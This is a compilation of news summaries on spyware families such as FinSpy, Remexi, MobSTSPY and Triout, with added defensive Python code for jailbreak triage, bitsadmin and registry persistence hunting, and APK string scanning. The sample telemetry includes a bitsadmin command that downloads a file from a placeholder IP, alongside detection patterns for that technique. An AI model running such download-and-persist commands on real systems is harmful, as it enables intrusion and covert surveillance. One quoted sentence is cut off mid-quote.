New FinSpy iOS and Android implants revealed ITW

By: GReAT ,AMR

FinSpy is spyware made by the German company Gamma Group. Through its UK-based subsidiary Gamma International, Gamma Group sells FinSpy to government and law enforcement organizations all over the world. FinSpy is used to collect a variety of private user information on various platforms. Its implants for desktop devices were first described in 2011 by Wikileaks, and mobile implants were discovered in 2012. Since then Kaspersky has continuously monitored the development of this malware and the emergence of new versions in the wild. According to our telemetry, several dozen unique mobile devices have been infected over the past year, with recent activity recorded in Myanmar in June 2019. Late in 2018, experts at Kaspersky analysed the latest functional versions of the FinSpy implants for iOS and Android, built in mid-2018. The iOS and Android implants have almost the same functionality. They are capable of collecting personal information such as contacts, SMS/MMS messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers.

Malware features

iOS

FinSpy for iOS is able to monitor almost all device activity, including recording VoIP calls made through external apps such as Skype or WhatsApp. The targeted applications include secure messengers such as Threema, Signal and Telegram. However, this functionality is achieved by leveraging Cydia Substrate’s hooking capability, so the implant can only be installed on jailbroken devices (iPhone or iPad; iPod has not been confirmed) running iOS 11 or below (newer versions had not been confirmed at the time of the research, and no implant for iOS 12 had been observed). Once deployed, the implant gives the attacker almost unlimited monitoring of the device’s activity.

The analyzed implant contained binary files for two different CPU architectures: ARMv7 and ARM64. Taking into account that iOS 11 is the first iOS version that does not support ARMv7 any more, we presumed that the 64-bit version was made to support iOS 11+ targets.

FinSpy for iOS does not appear to ship infection exploits for its customers; instead it seems to be fine-tuned to clean up the traces of publicly available jailbreaking tools. An attacker using the main infection vector therefore needs physical access to the device in order to jailbreak it. For already-jailbroken devices, there are at least three possible infection vectors:

  • SMS message
  • Email
  • WAP Push

Any of those can be sent from the FinSpy Agent operator’s terminal.

The installation process involves several steps. First, a shell script checks the OS version and executes the corresponding Mach-O binary: “install64” (64-bit) for iOS 11+, otherwise “install7” (32-bit). When started, the installer binary performs environmental checks, including whether Cydia Substrate is available; if it is not, the installer downloads the required packages from the Cydia repository and installs them with the “dpkg” tool. The installer then prepares paths and unpacks the package, randomly selects names for the framework and the app from a hardcoded list, deploys the components on the target system and sets the necessary permissions. Once deployment is complete, the daemon is started and all temporary installation files are deleted.
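The installer's environment checks hinge on artefacts that exist only on a jailbroken device, and those same artefacts are what an examiner looks for first. The following is an added example, not code from the article or from FinSpy itself: it triages a mounted iOS filesystem root for the well-known jailbreak paths and parses the dpkg status database to see whether Cydia Substrate (dpkg package name mobilesubstrate) is installed. The directory layout, package list and version strings are constructed in a temporary directory for the demonstration and are not taken from a real device.

```python
import tempfile
from pathlib import Path

# Paths that exist only after a jailbreak; the first two belong to Cydia Substrate,
# the hooking framework the FinSpy iOS implant relies on.
JAILBREAK_PATHS = [
    "Library/MobileSubstrate/MobileSubstrate.dylib",
    "Library/MobileSubstrate/DynamicLibraries",
    "Applications/Cydia.app",
    "usr/bin/dpkg",
    "var/lib/dpkg/status",
    "etc/apt",
]


def parse_dpkg_status(text):
    """Parse a dpkg status database into {package: version} for installed packages."""
    installed = {}
    for stanza in text.strip().split("\n\n"):
        fields = {}
        for line in stanza.splitlines():
            # continuation lines (e.g. long Description) start with whitespace; skip them
            if line and not line[0].isspace() and ":" in line:
                key, _, value = line.partition(":")
                fields[key.strip()] = value.strip()
        status = fields.get("Status", "").split()
        # "install ok installed" counts; "install ok not-installed" and
        # "deinstall ok config-files" do not.
        if fields.get("Package") and status and status[-1] == "installed":
            installed[fields["Package"]] = fields.get("Version", "")
    return installed


def triage_ios_root(root):
    """Report jailbreak indicators and installed Cydia packages under a mounted root."""
    root = Path(root)
    indicators = [p for p in JAILBREAK_PATHS if (root / p).exists()]
    status_file = root / "var/lib/dpkg/status"
    packages = parse_dpkg_status(status_file.read_text()) if status_file.is_file() else {}
    return {
        "jailbroken": bool(indicators),
        "indicators": indicators,
        "substrate_installed": "mobilesubstrate" in packages,
        "packages": packages,
    }


def build_sample_root():
    """Constructed layout of a jailbroken device's filesystem (not a real image)."""
    root = Path(tempfile.mkdtemp(prefix="ios_root_"))
    (root / "Library/MobileSubstrate/DynamicLibraries").mkdir(parents=True)
    (root / "Library/MobileSubstrate/MobileSubstrate.dylib").write_bytes(b"\xcf\xfa\xed\xfe")
    (root / "usr/bin").mkdir(parents=True)
    (root / "usr/bin/dpkg").write_bytes(b"")
    (root / "var/lib/dpkg").mkdir(parents=True)
    (root / "var/lib/dpkg/status").write_text(
        "Package: mobilesubstrate\nStatus: install ok installed\nVersion: 0.9.7033\n\n"
        "Package: cydia\nStatus: install ok installed\nVersion: 1.1.32\n\n"
        "Package: oldtool\nStatus: deinstall ok config-files\nVersion: 1.0\n"
    )
    return root


if __name__ == "__main__":
    print(triage_ios_root(build_sample_root()))
```

On a real acquisition, point triage_ios_root at the mounted root of the data partition; a device with Substrate installed but no recognisable jailbreak app is the situation the article describes, since the installer cleans up the traces of the jailbreak tool but must leave Substrate in place for the hooks to work.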

More: https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/

WannaHydra | Avast finds new mobile banking malware

By: Natalie Rosa

A new threat has been found by Avast, a company dedicated to digital security products, targeting the banks Santander, Itaú and Banco do Brasil, with a specific focus on Brazilian account holders.

Dubbed WannaHydra, the threat combines several malware functions in one: banking trojan, spyware and ransomware. According to the experts, the malware is spreading through malicious websites and third-party app stores.

Avast explains that WannaHydra shows the victim a fake alert stating that there is a problem with their bank account. The person then performs a supposed login to their account and is shown interfaces identical to the banks' real ones. Once the credentials have been entered, the cybercriminals have access to the victim's data.

More: https://canaltech.com.br/hacker/wannahydra-avast-encontra-novo-malware-bancario-para-dispositivos-moveis-143101/

What’s Farsi for ‘as subtle as a nuke through a window’? Foreign diplomats in Iran hit by renewed Remexi nasty
Iran, spying on foreigners within its borders? Shocked, shocked, we tell you

By: Shaun Nichols

A newly uncovered spyware-slinging operation appears to have been targeting foreign diplomats in Iran for more than three years.

Researchers at Kaspersky Lab said this week that a new build of the Remexi software nasty, first seen in 2015, has been spotted lurking on multiple machines within Iran, mostly those located within what we assume are foreign embassy buildings. The Windows-targeting surveillance-ware was previously associated with a hacking group known as Chafer, and an examination of the latest strain suggests it is of Iranian origin.

“The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when possible,” Kaspersky’s Denis Legezo said of the infection.

“The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS) bitsadmin.exe to receive commands and exfiltrate data.”

Curiously, Legezo said he does not yet know how the malware is spreading in the wild, just that it is targeting “foreign diplomatic entities” based within Iran.

“So far, our telemetry hasn’t provided any concrete evidence that shows us how the Remexi malware spread,” we’re told.

“However, we think it’s worth mentioning that for one victim we found a correlation between the execution of Remexi’s main module and the execution of an AutoIt script compiled as PE, which we believe may have dropped the malware.”

Once on a victim’s machine, the spyware is very persistent, hiding out in scheduled tasks, Userinit and Run registry keys in the HKLM hive, depending on the version of Windows it has infected. Data is exfiltrated to command and control servers using Microsoft’s bitsadmin.exe transfer utility.
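The persistence and exfiltration artefacts named above (HKLM Run and Userinit values, scheduled tasks, bitsadmin.exe transfers) are all cheap to hunt for. The following is an added example, not part of the article or Kaspersky's report: a small Python hunt over Sysmon-style process-creation events and registry values that flags bitsadmin.exe invoked with job-creating switches, extra entries appended to the Winlogon Userinit value, and Run entries launching from user-writable directories. The event records, the IP 203.0.113.5 and the binary name svchst.exe are constructed for the demonstration; the default Userinit string is the stock Windows one.

```python
import re

# Stock value of HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
# (the trailing comma is normal). Anything appended runs at every interactive logon.
DEFAULT_USERINIT = r"C:\Windows\system32\userinit.exe,"

# bitsadmin switches that create or feed a transfer job; /list or /info alone are benign.
BITS_JOB_SWITCHES = ("/transfer", "/create", "/addfile", "/setnotifycmdline", "/resume")
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Directories an unprivileged process can write to; legitimate autoruns rarely live there.
WRITABLE_DIR_RE = re.compile(r"\\(appdata|temp|programdata|users\\public)\\", re.IGNORECASE)


def bitsadmin_findings(events):
    """events: iterable of dicts with 'Image' and 'CommandLine' (Sysmon event ID 1 style)."""
    findings = []
    for ev in events:
        if not ev["Image"].lower().endswith("\\bitsadmin.exe"):
            continue
        cmd = ev["CommandLine"]
        switches = [s for s in BITS_JOB_SWITCHES if s in cmd.lower()]
        if switches:
            findings.append({"switches": switches, "urls": URL_RE.findall(cmd), "cmd": cmd})
    return findings


def userinit_extras(value):
    """Return every entry in the Userinit value other than the stock userinit.exe."""
    entries = [e.strip() for e in value.split(",") if e.strip()]
    default = DEFAULT_USERINIT.rstrip(",").lower()
    return [e for e in entries if e.lower() != default]


def suspicious_run_values(run_values):
    """run_values: {value name: command}; keep commands launched from user-writable dirs."""
    return {name: cmd for name, cmd in run_values.items() if WRITABLE_DIR_RE.search(cmd)}


# Constructed sample telemetry (not real Remexi artefacts).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /transfer job1 /download /priority normal "
                    r"http://203.0.113.5/u/x.dat C:\ProgramData\x.dat"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /list /allusers"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"svchost.exe -k netsvcs"},
]
SAMPLE_USERINIT = r"C:\Windows\system32\userinit.exe,C:\ProgramData\svchst.exe,"
SAMPLE_RUN = {
    "SecurityHealth": r"C:\Windows\system32\SecurityHealthSystray.exe",
    "Updater": r'"C:\ProgramData\svchst.exe" -s',
}


def hunt(events=SAMPLE_EVENTS, userinit=SAMPLE_USERINIT, run_values=SAMPLE_RUN):
    return {
        "bits": bitsadmin_findings(events),
        "userinit_extras": userinit_extras(userinit),
        "run": suspicious_run_values(run_values),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(hunt(), indent=2))
```

Feed it the output of your EDR or Sysmon export for the process events and a registry dump for the two keys; the same checks translate directly into Sigma rules if you already run a SIEM.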

According to timestamps in the malware, its development appears to have been completed in March 2018, though there are a few sections of the code that appear to be much older.

More: https://www.theregister.co.uk/2019/01/31/iran_embassies_malware/

Hundreds of Thousands Download Spyware from Google Play

By: Ionut Arghire

Hundreds of thousands of users ended up with spyware on their devices after downloading seemingly legitimate applications from Google Play, Trend Micro security researchers have discovered. 

Detected as MobSTSPY, the malware, which can gather various information from the victims, isn’t new. For distribution, its operators chose to masquerade the threat as legitimate Android applications and submit them to Google Play.

Trend Micro discovered a total of six such applications, including FlashLight, HZPermis Pro Arabe, Win7imulator, Win7Launcher, Flappy Bird, and Flappy Birr Dog. Available for download in Google Play in 2018, some of these were downloaded over 100,000 times by users from all over the world.

Once one of these applications has been installed on the victim’s device, the spyware can proceed to stealing information such as SMS conversations, call logs, user location, and clipboard items. The malware sends the collected information to the attacker’s server using Firebase Cloud Messaging.

Upon initial execution, the malware checks the device’s network availability, after which it reads and parses an XML configuration file from its command and control (C&C) server. Next, it collects information such as language used on the device, registered country, package name, manufacturer, etc.

The information is then sent to the C&C server for registration purposes. After this step has been completed, the malware waits for the server to send over commands to execute.

Based on the received commands, the spyware can not only steal SMS messages and call logs, but can also retrieve contact lists and files found on the device.

The malware can also perform a phishing attack to gather credentials from the infected device, the security researchers discovered. It can display fake Facebook and Google pop-ups, thus tricking the user into revealing their account details.

After the user provides the credentials, a fake pop-up informs them the log-in was unsuccessful, but at this point the malware has already stolen the credentials.

“Part of what makes this case interesting is how widely its applications have been

More: https://www.securityweek.com/hundreds-thousands-download-spyware-google-play

Android ‘Triout’ spyware records calls, sends photos and text messages to attackers

By: Ms. Smith

Triout, a creepy Android spyware identified by Bitdefender researchers, can secretly snap photos and videos, record phone calls, log text messages and keep track of victims’ locations. The spyware framework’s extensive surveillance capabilities that can be bundled into benign apps make it likely that it is part of an espionage campaign.

The malicious app contains the same code and functionality as the original app, plus the malicious payload. Perhaps there were a lot of people in Israel looking to spice up their love lives, because that is where most of the Triout-infected ‘Sex Game’ (SexGameForAdults) apps were detected. The first malware sample, however, was originally submitted to VirusTotal from Russia on May 15, 2018.

Triout was detected by Bitdefender’s machine learning algorithms. Bitdefender researchers suspect the Triout spyware is being hosted on attacker-controlled domains or third-party marketplaces. The firm suspects it is being used for an espionage campaign, but does not know what group or nation is behind it.

The spyware capabilities include:

  • Recording every phone call as a media file and sending it along with the call date, call duration and the caller ID to a C&C server.
  • Logging every incoming text message and sending it to the C&C.
  • Taking photos with the front and rear cameras and sending those to the C&C server; the camera capture was described as “one of the more disturbing features” by Bitdefender.
  • Logging GPS coordinates and sending the tracked data to the C&C.
  • The Android spyware can also hide itself from the user.

Despite all those advanced spying features, the most striking thing about the sample, according to Bitdefender’s whitepaper (pdf), “is that it’s completely unobfuscated, meaning that simply by unpacking the .apk file, full access to the source code becomes available. This could suggest the framework may be a work-in-progress, with developers testing features and compatibility with devices.” The C&C server, a single, hardcoded IP address, to which the app sends the collected data has been operational since May.
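Because the sample was unobfuscated and talked to a single hardcoded IP, two quick static checks would have surfaced it. This is an added example, not Bitdefender's tooling or anything from the whitepaper: it opens an APK as the zip it is, pulls IPv4 literals and URLs out of every entry, and scores the class descriptors in classes.dex by how many have one- or two-character simple names, which is a rough heuristic for name obfuscation. The APK built inline, the package com.example.sexgame and the address 192.0.2.44 are constructed for the demonstration.

```python
import io
import re
import zipfile

# IPv4 literal not embedded in a longer dotted run (so "1.2.3.4.5" is not split up).
IPV4_RE = re.compile(rb"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
URL_RE = re.compile(rb"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s\"'\x00]*)?")
# Dalvik class descriptor as it appears in the dex string table, e.g. Lcom/example/Foo;
CLASS_RE = re.compile(rb"L[A-Za-z0-9_$/]+;")


def valid_ipv4(literal):
    return all(0 <= int(p) <= 255 for p in literal.decode().split("."))


def scan_apk(apk_bytes):
    """Return {'ips': {ip: {entries}}, 'urls': {url: {entries}}} over all zip entries."""
    hits = {"ips": {}, "urls": {}}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        for name in z.namelist():
            blob = z.read(name)
            for m in IPV4_RE.findall(blob):
                if valid_ipv4(m):
                    hits["ips"].setdefault(m.decode(), set()).add(name)
            for m in URL_RE.findall(blob):
                hits["urls"].setdefault(m.decode(), set()).add(name)
    return hits


def obfuscation_ratio(dex_bytes):
    """Fraction of distinct class descriptors whose simple name is <= 2 chars (heuristic)."""
    names = {m[1:-1].rsplit(b"/", 1)[-1] for m in CLASS_RE.findall(dex_bytes)}
    if not names:
        return 0.0
    return sum(1 for n in names if len(n) <= 2) / len(names)


def build_sample_apk():
    """Constructed stand-in for an unobfuscated spyware APK (not a real sample)."""
    dex = (
        b"dex\n035\x00" + b"\x00" * 8
        + b"Lcom/example/sexgame/MainActivity;\x00"
        + b"Lcom/example/sexgame/CallRecorder;\x00"
        + b"http://192.0.2.44:8080/upload\x00"   # single hardcoded C&C, constructed
        + b"build 300.1.2.3\x00"                 # looks like an IP but is not a valid one
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        # real manifests are binary XML; plain text is enough for this demonstration
        z.writestr("AndroidManifest.xml", b'<manifest package="com.example.sexgame"/>')
        z.writestr("classes.dex", dex)
    return buf.getvalue()


def triage(apk_bytes):
    hits = scan_apk(apk_bytes)
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        ratio = obfuscation_ratio(z.read("classes.dex"))
    return {"ips": hits["ips"], "urls": hits["urls"], "obfuscation_ratio": ratio}


if __name__ == "__main__":
    print(triage(build_sample_apk()))
```

An obfuscation ratio near zero with exactly one routable IP in the string table is the profile the whitepaper describes; a ProGuard-processed app would score close to one and usually keeps its endpoints in resources or fetches them at runtime.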

More: https://www-csoonline-com.cdn.ampproject.org/

Over 500 Android Apps On Google Play Store Found Spying On 100 Million Users

By: sikur

By Swati Khandelwal

Over 500 different Android apps, downloaded more than 100 million times in total from the official Google Play Store, have been found to be infected with a malicious ad library that secretly distributes spyware to users and can perform dangerous operations.

Since around 90 per cent of Android apps are free to download from the Google Play Store, advertising is a key revenue source for app developers. To monetise, they integrate an advertising SDK into their apps, which usually does not affect an app’s core functionality.

But security researchers at mobile security firm Lookout have discovered a software development kit (SDK), dubbed Igexin, that has been found delivering spyware on Android devices.

MORE: http://thehackernews.com/2017/08/android-spyware-malware.html

Google Detects Dangerous Spyware Apps On Android Play Store

By: sikur

By Swati Khandelwal

Security researchers at Google have discovered a new family of deceptive Android spyware that can steal a great deal of user information, including text messages, emails, voice calls, photos, location data and other files, and spy on its victims.

Dubbed Lipizzan, the Android spyware appears to have been developed by Equus Technologies, an Israeli startup that Google referred to as a ‘cyber arms’ seller in a blog post published Wednesday.

With the help of Google Play Protect, the Android security team has found Lipizzan spyware on at least 20 apps in Play Store, which infected fewer than 100 Android smartphones in total.

MORE: http://thehackernews.com/2017/07/lipizzan-android-spyware.html
